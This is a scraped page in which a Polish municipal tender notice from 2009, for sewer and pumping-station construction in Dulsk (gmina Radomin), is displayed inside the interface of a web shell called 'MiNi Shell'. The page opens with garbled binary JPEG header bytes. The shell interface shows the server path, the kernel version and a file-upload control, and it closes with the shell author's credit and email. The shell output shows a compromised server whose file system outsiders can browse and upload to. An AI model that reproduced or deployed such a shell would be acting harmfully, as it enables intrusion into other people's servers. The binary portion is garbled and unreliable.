JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/152102-N-2009.html

<p class="kh_header"><b>Radomin: Budowa kanalizacji sanitarnej grawitacyjno-tłocznej,  z  przyłączami  i przepompownią  ścieków PS-5  w miejscowości  Dulsk,  gmina Radomin</b><br>
<b>Numer ogłoszenia: 152102 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Radomin , Radomin 1a, 87-404 Radomin, woj. kujawsko-pomorskie, tel. 056 6837522.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.radomin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej grawitacyjno-tłocznej,  z  przyłączami  i przepompownią  ścieków PS-5  w miejscowości  Dulsk,  gmina Radomin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia, do wykonania, jest:
    1. sieć kanalizacji (grawitacyjnej i  tłocznej ), o łącznej długości = 2.642 mb 
     w tym: a) kanalizacja grawitacyjna:  rury PCV lite-  O 200 =  816 mb 
                 b) kanalizacja tłoczna:    O 110   = 247 mb
                 c) kanalizacja ciśnieniowa: PE  =   1.579 mb, ( PE O 50- 1.045mb i  PE O 63- 534 m)
   2. studzienki    
             a) rewizyjne żelbet. na rurociągach tłocznych ( od R1 do R7)- O1200mm  - 7 szt.
             b) połączeniowe żelbet. O 1200mm z zaworami zwrotnymi  (  od SP-1 do SP-3) - 3 szt
             c) studzienki O 425 ( niewłazowe) -  73 szt

   3. przyłącza kanalizacyjne,  o łącznej długości   =  1.821 mb   -   ogółem 81 szt
        w tym: a)  przyłącza grawitacyjne  - 12 szt. -    PCV rury lite =  820 mb 
                                                                                    (   O 160 = 811 mb i   O 200 = 9mb)
                    b) przyłącza ciśnieniowe   - 69 szt   -   rury PE   =   1001 mb 
                                                                                    ( O 40 =  985 mb i PE O 63 = 16 mb
                     c) instalacja wewnętrzna ( od budynku do pierwszej studzienki)
                                                                dla wykonania przyłączy  PCV O160  = 135 mb
     4. studzienki pompowe dla przyłączy kanalizacyjnych   =   69 szt.
          w tym:  a)  studzienki pompowe O 800 mm  z  polimerobetonu z wyposażeniem  ( 1 pompa 
                            wyporowa)   =  68 szt
                       b) studzienka pompowa   O 1200 mm z wyposażeniem ( 2 pompy )  = 1 szt                                                                                                              

   5.   przepompownia ścieków PS-5  na sieci głównej , w tym:
        a) zbiornik przepompowni  z polimerobetonu  O1500 mm z dwiema pompami typu SH/255,
          o  silnikach  mocy 4,2 kW każdy,   wydajność 4,5 m3/s i wysokości podnoszenia H=  24 m
        b) rurociągi tłoczne w przepompowni: O80 z rur stalowych i  w  terenie PE 100 O110

Łączna długość sieci     kanalizacyjnej ( tłocznej i grawitacyjnej) oraz przyłączy ,
wynosi 4.463 mb + instalacja wewnętrzna do budynków =  135 mb.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8, 45.23.11.00-6, 45.23.11.10-9, 45.23.13.00-8, 45.23.20.00-2, 45.23.24.10-9, 45.23.21.00-3, 45.23.21.50-8, 45.23.32.20-7, 45.34.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział wykonawcy spełniający warunki zawarte w art. 22 ustawy z 
dnia 29 stycznia 2004r. - Prawo zamówień publicznych i nie  podlegający wykluczeniu na podstawie art. 24 wymienionej ustawy oraz spełniający warunki zawarte w specyfikacji istotnych warunków zamówienia. Ocena spełnienia warunków wymaganych od Wykonawców, zostanie dokonana w oparciu o zestawienie tych warunków, na zasadzie -spełnia - nie spełnia- 
Oferent musi potwierdzić, że zapoznał się z warunkami udzielenia zamówienia, zawartymi w 
Specyfikacji Istotnych Warunków Zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferent ubiegający się o przedmiotowe zamówienie publiczne musi dołączyć do oferty następujące dokumenty:
1. Aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności 
    gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału 
    Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego                    
    potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz         
    składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie,  że uzyskał przewidziane 
    prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w 
    całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed 
     upływem terminu składania  ofert.
3. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt      
     4-8  i w art. 24 ust. 1 pkt 9  ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem 
     terminu składania ofert.
4. Wykaz wykonanych min. 3 robót budowlanych, w okresie ostatnich 5 lat przed dniem   
     wszczęcia  postępowania o udzielenia zamówienia, a jeżeli okres prowadzenia działalności jest 
     krótszy - w    tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym 
     stanowiącym przedmiot zamówienia  wraz  z załączeniem dokumentów ( referencji ) 
     potwierdzających, że   roboty zostały wykonane należycie.
5. Wykaz sprzętu i środków transportu, który będzie użyty do wykonania zamówienia.
6. Wykaz osób, które będą wykonywać zamówienie, z podaniem ich kwalifikacji zawodowych , 
    doświadczenia,  wykształcenia i uprawnień do kierowania robotami budowlanymi
    ( przynależność do Izby właściwej branżowo),   jako    niezbędnych do wykonania 
    wymienionego  zamówienia. Kierownik budowy powinien posiadać min. 3 letnie doświadczenie 
     w kierowaniu robotami  budowlanymi  z zakresu objętego niniejszym zamówieniem.
7. Polisę ubezpieczeniową   lub inny dokument  potwierdzający, że wykonawca jest ubezpieczony 
    od odpowiedzialności cywilnej w zakresie prowadzonej działalności, o wartości nie mniejszej niż                       
     300.000 zł.
8  Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca 
    posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność   
    kredytową wykonawcy do wykonania zamówienia, wystawionej nie wcześniej niż 3 miesiące 
    przed upływem terminu    składania  ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.radomin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Radomin, Radomin 1a, 87-404 Radomin, pokój Nr 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 13:00, miejsce: Siedziba Urzędu Gminy Radomin, Radomin 1a,  87-404 Radomin, pow. golubsko-dobrzyński, pokój Nr 8, I piętro, Sekretariat urzędu..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com